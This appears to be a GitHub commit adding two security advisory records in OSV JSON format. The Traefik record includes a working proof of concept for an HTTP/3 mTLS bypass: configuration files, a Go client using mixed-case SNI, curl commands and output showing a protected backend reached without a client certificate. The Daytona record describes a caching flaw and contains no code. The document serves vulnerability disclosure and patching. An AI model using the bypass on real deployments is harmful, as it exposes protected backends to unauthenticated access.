Skip to content

Commit 1f8039a

Browse files
1 parent 5250748 commit 1f8039a

2 files changed

Lines changed: 163 additions & 0 deletions

File tree

Lines changed: 102 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,102 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-9cr8-q42q-g8m7",
4+
"modified": "2026-06-16T21:04:29Z",
5+
"published": "2026-06-16T21:04:29Z",
6+
"aliases": [
7+
"CVE-2026-53622"
8+
],
9+
"summary": "Traefik: HTTP/3 mTLS bypass via exact SNI TLSOptions lookup for wildcard and mixed-case hosts",
10+
"details": "## Summary\n\nThere is a critical vulnerability in Traefik's HTTP/3 (QUIC) TLS configuration selection that allows unauthenticated clients to bypass router-specific mTLS enforcement. When HTTP/3 is enabled on an entrypoint, the TLS handshake selects the applicable TLS configuration through an exact, case-sensitive lookup on the SNI value, which fails to match wildcard host patterns (e.g., `*.example.com`) or case variants of the configured hostname. Because the handshake falls back to the default TLS configuration — which may not require client certificates — a client can complete the QUIC handshake without presenting a certificate, while the subsequent HTTP routing layer still dispatches the request to a backend protected by a router-specific mTLS policy. The issue affects deployments where HTTP/3 is enabled, a router uses a wildcard `Host` rule or case-insensitive hostname matching, a router-specific `TLSOptions` enforces client certificate authentication, and UDP access to the entrypoint is reachable by an attacker.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v3.7.3\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\n\nTraefik's HTTP/3 TLS configuration selection can ignore router-specific `TLSOptions` and allow unauthenticated clients to bypass mTLS. The QUIC/HTTP3 path resolves TLS configuration with `Router.GetTLSGetClientInfo()`, which performs a direct, case-sensitive map lookup on `hostHTTPTLSConfig[info.ServerName]`.\n\nThis is inconsistent with the later HTTP host routing semantics, where the same request host can still match wildcard or case-insensitive `Host` rules after the HTTP/3 TLS handshake has already fallen back to the default TLS configuration. Two exploit paths are confirmed:\n\n1. `Host(\"*.example.com\")` with `tls.options=mtls`: HTTP/2 requires a client certificate, but HTTP/3 reaches the protected backend without one.\n2. `Host(\"api.example.com\")` with `tls.options=mtls`: HTTP/2 requires a client certificate, but HTTP/3 with mixed-case SNI/Host such as `API.EXAMPLE.COM` reaches the protected backend without one.\n\nConfirmed versions:\n\n- wildcard HTTP/3 bypass: `v3.7.0`, `v3.7.1`\n- exact-host mixed-case HTTP/3 bypass: `v3.6.17`, `v3.7.0`, `v3.7.1`\n\n### Details\n\nHTTP/3 installs a QUIC TLS callback in `pkg/server/server_entrypoint_tcp_http3.go`:\n\n```go\nh3.Server = &http3.Server{\n Addr: config.GetAddress(),\n Port: config.HTTP3.AdvertisedPort,\n Handler: httpsServer.Server.(*http.Server).Handler,\n TLSConfig: &tls.Config{GetConfigForClient: h3.getGetConfigForClient},\n}\n```\n\nThe callback is wired to the TCP router's TLS selector:\n\n```go\nfunc (e *http3server) Switch(rt *tcprouter.Router) {\n e.lock.Lock()\n defer e.lock.Unlock()\n\n e.getter = rt.GetTLSGetClientInfo()\n}\n```\n\nThe selector in `pkg/server/router/tcp/router.go` only performs an exact map lookup:\n\n```go\nfunc (r *Router) GetTLSGetClientInfo() func(info *tls.ClientHelloInfo) (*tls.Config, error) {\n return func(info *tls.ClientHelloInfo) (*tls.Config, error) {\n if tlsConfig, ok := r.hostHTTPTLSConfig[info.ServerName]; ok {\n return tlsConfig, nil\n }\n\n return r.httpsTLSConfig, nil\n }\n}\n```\n\nThat creates two mismatches:\n\n- wildcard keys such as `*.example.com` are never matched for `api.example.com`\n- lower-case router keys such as `api.example.com` are not matched for mixed-case SNI such as `API.EXAMPLE.COM`\n\nOn the later HTTP request path, the same host can still match wildcard or case-insensitive `Host` rules through the muxer. The HTTP/3 TLS handshake path falls back to the default TLS config before that routing decision happens. If the default TLS config does not require a client certificate, the QUIC handshake succeeds without mTLS, and the later HTTP router still routes to the protected backend.\n\nPreconditions:\n\n- HTTP/3 is enabled on the affected entrypoint.\n- A router-specific `TLSOptions` configuration enforces client certificate authentication.\n- The default/fallback TLS configuration does not require client certificates.\n- UDP access to the HTTP/3 entrypoint is reachable by the attacker.\n\nMinimal wildcard dynamic configuration:\n\n```yaml\nhttp:\n routers:\n protected:\n rule: Host(`*.example.com`)\n service: protected\n tls:\n options: mtls\n\n services:\n protected:\n loadBalancer:\n servers:\n - url: http://protected:80\n\ntls:\n certificates:\n - certFile: /certs/server.crt\n keyFile: /certs/server.key\n\n options:\n mtls:\n clientAuth:\n caFiles:\n - /certs/ca.crt\n clientAuthType: RequireAndVerifyClientCert\n```\n\nMinimal exact-host dynamic configuration:\n\n```yaml\nhttp:\n routers:\n protected:\n rule: Host(`api.example.com`)\n service: protected\n tls:\n options: mtls\n\n services:\n protected:\n loadBalancer:\n servers:\n - url: http://protected:80\n\ntls:\n certificates:\n - certFile: /certs/server.crt\n keyFile: /certs/server.key\n\n options:\n mtls:\n clientAuth:\n caFiles:\n - /certs/ca.crt\n clientAuthType: RequireAndVerifyClientCert\n```\n\nMinimal Docker Compose:\n\n```yaml\nservices:\n traefik:\n image: traefik:v3.7.1\n command:\n - --log.level=DEBUG\n - --entrypoints.websecure.address=:8443\n - --entrypoints.websecure.http3\n - --providers.file.filename=/etc/traefik/dynamic.yml\n - --providers.file.watch=false\n ports:\n - \"8443:8443/tcp\"\n - \"8443:8443/udp\"\n volumes:\n - ./dynamic.yml:/etc/traefik/dynamic.yml:ro\n - ./certs:/certs:ro\n depends_on:\n - protected\n\n protected:\n image: traefik/whoami:v1.11\n command:\n - --name=PROTECTED\n```\n\nCertificate generation:\n\n```bash\nrm -rf certs\nmkdir -p certs\n\nopenssl req -x509 -newkey rsa:2048 -nodes -days 7 -keyout certs/ca.key -out certs/ca.crt -subj \"/CN=traefik-poc-ca\"\n\nopenssl req -newkey rsa:2048 -nodes -keyout certs/server.key -out certs/server.csr -subj \"/CN=api.example.com\" -addext \"subjectAltName=DNS:api.example.com,DNS:*.example.com\"\n\nopenssl x509 -req -in certs/server.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial -out certs/server.crt -days 7 -sha256 -copy_extensions copyall\n```\n\nThe mixed-case HTTP/3 client used for the exact-host case:\n\n```go\npackage main\n\nimport (\n \"crypto/tls\"\n \"fmt\"\n \"io\"\n \"net/http\"\n \"os\"\n \"time\"\n\n \"github.com/quic-go/quic-go/http3\"\n)\n\nfunc main() {\n serverName := os.Getenv(\"TLS_SERVER_NAME\")\n if serverName == \"\" {\n serverName = \"API.EXAMPLE.COM\"\n }\n\n host := os.Getenv(\"HTTP_HOST\")\n if host == \"\" {\n host = \"API.EXAMPLE.COM\"\n }\n\n tr := &http3.Transport{\n TLSClientConfig: &tls.Config{\n ServerName: serverName,\n InsecureSkipVerify: true,\n },\n }\n defer tr.Close()\n\n client := &http.Client{Transport: tr, Timeout: 8 * time.Second}\n\n req, err := http.NewRequest(http.MethodGet, \"https://127.0.0.1:8443/\", nil)\n if err != nil {\n panic(err)\n }\n req.Host = host\n\n resp, err := client.Do(req)\n if err != nil {\n fmt.Fprintln(os.Stderr, err)\n os.Exit(1)\n }\n defer resp.Body.Close()\n\n fmt.Println(resp.Proto, resp.StatusCode)\n body, _ := io.ReadAll(resp.Body)\n fmt.Print(string(body))\n}\n```\n\n### PoC\n\nWildcard bypass:\n\n1. Start Traefik with the wildcard dynamic configuration above.\n2. Control over TCP/TLS:\n\n```bash\ncurl --noproxy '*' --http2 -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/\n```\n\nObserved result:\n\n```text\nTLS alert ... certificate required\n```\n\n3. HTTP/3 bypass:\n\n```bash\ncurl --noproxy '*' --http3-only -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/\n```\n\nObserved result:\n\n```text\nHTTP/3 200\nName: PROTECTED\nHost: api.example.com:8443\n```\n\nExact-host mixed-case bypass:\n\n1. Start Traefik with the exact-host dynamic configuration above.\n2. Control over TCP/TLS:\n\n```bash\ncurl --noproxy '*' --http2 -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/\n```\n\nObserved result:\n\n```text\nTLS alert ... certificate required\n```\n\n3. Mixed-case HTTP/2 control:\n\n```bash\ncurl --noproxy '*' --http2 -skv --resolve API.EXAMPLE.COM:8443:127.0.0.1 https://API.EXAMPLE.COM:8443/\n```\n\nObserved result:\n\n```text\nTLS alert ... certificate required\n```\n\nThis control confirms that the bypass is specific to the HTTP/3 TLS configuration selection path in this test setup. The HTTP/2 request to the same mixed-case hostname still fails with `certificate required`.\n\n4. HTTP/3 bypass with the same mixed-case hostname:\n\n```bash\nTLS_SERVER_NAME=API.EXAMPLE.COM HTTP_HOST=API.EXAMPLE.COM go run ./h3-case-client.go\n```\n\nObserved result:\n\n```text\nHTTP/3.0 200\nName: PROTECTED\nHost: API.EXAMPLE.COM\n```\n\nLocal regression tests used during validation:\n\n```bash\ngo test ./pkg/server/router/tcp -run 'TestGetTLSGetClientInfo_(WildcardCurrentBehavior|ExactHostCaseSensitivityCurrentBehavior)$' -count=1\n```\n\nThese tests were added locally during analysis to demonstrate the current behavior of `GetTLSGetClientInfo()`. They are not required to reproduce the issue; the Docker and `curl`/HTTP3 commands above are the end-to-end reproduction.\n\nVersion matrix observed with Docker images:\n\n```text\nwildcard H3 bypass: affected on v3.7.0 and v3.7.1\nexact-case H3 bypass: affected on v3.6.17, v3.7.0, and v3.7.1\n```\n\nThe wildcard case was tested on v3.7.x because wildcard `Host` / `HostSNI` matching and TLSOptions association for wildcard domains were introduced in v3.7.0.\n\n### Impact\n\nDeployments that use router `TLSOptions` as an access-control boundary for HTTP/3 can expose protected backends without client authentication.\n\nThe highest-impact case is mTLS:\n\n- normal HTTP/2/TCP access to the protected host requires a client certificate\n- HTTP/3 access to the same route falls back to the default TLS config\n- the request is then routed to the protected backend without satisfying the route's mTLS policy\n\nThis can expose confidential data or privileged backend operations to unauthenticated network clients. The issue is especially severe because it does not require credentials, user interaction, or a prior foothold.\n\nPossible workarounds until a fix is available:\n\n- Disable HTTP/3 on entrypoints that rely on router-specific mTLS.\n- Enforce mTLS in the default TLS options as well, so fallback TLS configuration is not weaker than router-specific configuration.\n- Block UDP access to the HTTP/3 entrypoint.\n- Enforce client authentication at an additional layer behind Traefik.\n\n</details>\n\n---",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "Traefik"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "3.7.3"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 3.7.2"
38+
}
39+
},
40+
{
41+
"package": {
42+
"ecosystem": "Go",
43+
"name": "github.com/traefik/traefik/v2"
44+
},
45+
"ranges": [
46+
{
47+
"type": "ECOSYSTEM",
48+
"events": [
49+
{
50+
"introduced": "0"
51+
},
52+
{
53+
"last_affected": "2.11.50"
54+
}
55+
]
56+
}
57+
]
58+
},
59+
{
60+
"package": {
61+
"ecosystem": "Go",
62+
"name": "github.com/traefik/traefik"
63+
},
64+
"ranges": [
65+
{
66+
"type": "ECOSYSTEM",
67+
"events": [
68+
{
69+
"introduced": "0"
70+
},
71+
{
72+
"last_affected": "1.7.34"
73+
}
74+
]
75+
}
76+
]
77+
}
78+
],
79+
"references": [
80+
{
81+
"type": "WEB",
82+
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-9cr8-q42q-g8m7"
83+
},
84+
{
85+
"type": "PACKAGE",
86+
"url": "https://github.com/traefik/traefik"
87+
},
88+
{
89+
"type": "WEB",
90+
"url": "https://github.com/traefik/traefik/releases/tag/v3.7.3"
91+
}
92+
],
93+
"database_specific": {
94+
"cwe_ids": [
95+
"CWE-288"
96+
],
97+
"severity": "HIGH",
98+
"github_reviewed": true,
99+
"github_reviewed_at": "2026-06-16T21:04:29Z",
100+
"nvd_published_at": null
101+
}
102+
}
Lines changed: 61 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,61 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-ww63-pv5x-vfc8",
4+
"modified": "2026-06-16T21:05:14Z",
5+
"published": "2026-06-16T21:05:13Z",
6+
"aliases": [
7+
"CVE-2026-54321"
8+
],
9+
"summary": "Daytona: Public sandbox previews remain accessible for up to one hour after being made private",
10+
"details": "### Summary\nSandbox previews that were switched from public to private could remain reachable without authentication for a short period after the change, due to a cached visibility state that was not invalidated when the sandbox's visibility changed.\n\n### Impact\nWhen a sandbox owner changed a preview from public to private, the preview proxy could continue serving unauthenticated requests to that sandbox's ordinary preview ports for a bounded period before the change took effect. Only sandboxes that had been made public and were later set back to private were affected, and only until the proxy's cached visibility state was refreshed. Terminal, toolbox, and recording-dashboard ports were never affected, as those always require authentication. The issue did not involve cross-tenant access, privilege escalation, or remote code execution.\n\n### Patches\nFixed in v0.184.0. Sandbox visibility changes now invalidate the proxy's cached preview state immediately, so revoking a public preview takes effect on the next request.\n\n### Workarounds\nUpgrade to v0.184.0 or later. There is no configuration workaround for earlier versions.\n\n### Credit\nReported through Daytona's Vulnerability Disclosure Program by **mrknightnidu(nidalkhan)**.\n**Linkedin**: https://www.linkedin.com/in/mrknight-nidu-031340328/",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/daytonaio/daytona"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0.101.0"
29+
},
30+
{
31+
"fixed": "0.184.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 0.183.0"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/daytonaio/daytona/security/advisories/GHSA-ww63-pv5x-vfc8"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/daytonaio/daytona"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-613",
54+
"CWE-863"
55+
],
56+
"severity": "HIGH",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-06-16T21:05:13Z",
59+
"nvd_published_at": null
60+
}
61+
}

0 commit comments

Comments
 (0)